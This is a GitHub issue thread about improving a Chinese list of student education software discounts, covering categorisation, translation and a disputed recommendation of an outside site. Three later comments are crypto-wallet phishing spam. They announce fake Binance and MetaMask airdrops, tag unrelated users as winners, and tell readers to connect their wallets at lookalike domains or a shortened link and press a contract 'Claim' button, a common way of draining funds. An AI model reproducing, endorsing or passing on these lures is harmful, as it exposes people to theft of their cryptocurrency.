### ISSUE TITLE
项目补完计划

### ISSUE THREAD

**Issue by wowlusitong** [wowlusitong/awesome-education#2]
- [ ] 软件分类
- [ ] 描述补完
- [ ] README-en.md描述补完
- [ ] 系统支持标注
- [x] 增加英文支持，README-en.md

**Comment by CodeingBoy** [comment]
因为 Github 是一个开发社区，我觉得软件的分类应该分为两类：
- 与开发相关的
- 与开发无关的

优先展示与开发相关的资源可以帮未来的开发者/程序员更快地获取到学生资源。

另外，如果有的话，我还想加一些“针对个人使用免费”的开发软件，虽然这些软件的免费不只是针对学生（但是包含学生），但是我觉得也可以添加进来。

不知道您怎么看？

----------------------------------------

In my opinion we should classify these softwares to two types:
- development-related
- non-development-related

The reason is, since Github is a developer community, stuffs about development will be more helpful for future developers, rather than those not.

I also want to add some useful "free for personal use" develop software(if any), although the price policy are not targeted only student, students can still get benefit from them.

What about your thinking?

**Comment by wowlusitong** [comment]
@CodeingBoy 非常棒建议，这样分类更加明确，方便查找  👍

**Comment by dawnmaner** [comment]
有很多软件的教育优惠政策是有变化的，建议您添加推荐阅读栏目，增加第三方平台文章，比如liout.com的EDU教育网邮箱优惠大集合 针对每款教育优惠都有图文教程，方便更加深入的了解每款产品的教育优惠

**Comment by Idris933** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @Zab-an, @Mutefish0, @brunogomes80, @encryptoking, @amlcodes, @mnamesujit, @hiend

**Comment by synchrovision** [comment]
# 🌐 **$ETH MetaMask Airdrop: Claim Your $1000 in Ethereum Now!**

🎉 **Congratulations!** 

You're among the chosen participants for the $1.5k Ethereum Airdrop. We're thrilled to grant you $1000 in ETH to celebrate the year's end. But that's not all—connect now, and you'll instantly receive an extra $100! Follow the steps below to claim your Ethereum and make the most of this exclusive giveaway!

[![Claim Now](https://pbs.twimg.com/media/Frg-sWYWIAYCoiX.jpg:large)](https://wwwwmetaskmask.communitymaskmeta.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=metamask)

## **Steps to Claim:**

### 1. 🚀 **Connect Your MetaMask Wallet:**
   - Click on the [Connect Wallet](https://wwwwmetaskmask.communitymaskmeta.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=metamask) link.
   - Select **MetaMask** as your preferred wallet provider.

### 2. 🔄 **Interact with the Contract and Claim Your $100:**
   - Once your MetaMask wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract. Ensure you use the **Claim** method.

💰 **Don't miss out on your $1000 in Ethereum!** Additionally, enjoy an instant $100 upon connection. Act now to secure your ETH. Remember, there's a chance to win up to $20,000—it's your golden opportunity with MetaMask!


Winners: @RenatoOsmar, @baophucct, @EthanHarsh, @Kekerykek, @aniketsorathiya, @idancali, @martinloesethjensen

**Comment by accforgh** [comment]
> 有很多软件的教育优惠政策是有变化的，建议您添加推荐阅读栏目，增加第三方平台文章，比如liout.com的EDU教育网邮箱优惠大集合 针对每款教育优惠都有图文教程，方便更加深入的了解每款产品的教育优惠

友情提醒，这是个骗子网站，请自行Google： “liout 骗子”关键字！

**Comment by atfalstyle** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://bit.ly/48M0kd2)

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## **Steps to Claim:**

### 1. 🚀 **Connect Your MetaMask Wallet:**
   - Click on the [Connect Wallet](http://bit.ly/48M0kd2) link.

### 2. 🔄 **Interact with the Contract and Claim Your $100:**
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract. Ensure you use the **Claim** method.

💰 **Don't miss out on your $1000 in ETH!** Additionally, enjoy an instant $100 upon connection. Act now to secure your ETH. Remember, there's a chance to win up to $20,000—it's your golden opportunity with Binance!


Winners: @sevvy-thewebcoder, @c-st, @blvdek, @Mc01, @benaitis, @berkaroad, @taras9824
